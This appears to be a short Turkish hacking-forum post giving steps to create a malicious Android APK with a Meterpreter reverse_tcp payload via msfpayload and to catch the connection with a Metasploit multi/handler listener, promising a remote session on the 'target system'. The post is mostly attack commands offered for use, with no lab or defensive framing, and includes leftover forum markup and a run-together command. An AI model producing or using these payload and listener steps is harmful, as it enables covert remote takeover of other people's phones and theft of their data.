-
excalibur16
[]
Yazının altındaki adımları uyguladığınız zaman hedef sistemde Meterpreter oturumu sağlarsınız meterpreter komutlarına şuradan ulaşabilirsiniz;
http://www.spyhackerz.com/forum/threads/meterpreter-komutları.549/
[/LIST]
http://www.spyhackerz.com/forum/threads/meterpreter-komutları.549/
PHP:
msfpayload android/meterpreter/reverse_tcp LHOST="LOCAL İP" LPORT=443 R >dosyam.apk
PHP:
[LIST]
[*]msfconsole
[*]use exploit/multi/handlerset
[*]payload android/meterpreter/reverse_tcp
[*]set lhost "LOCAL İP"
[*]set lport 443
[*]run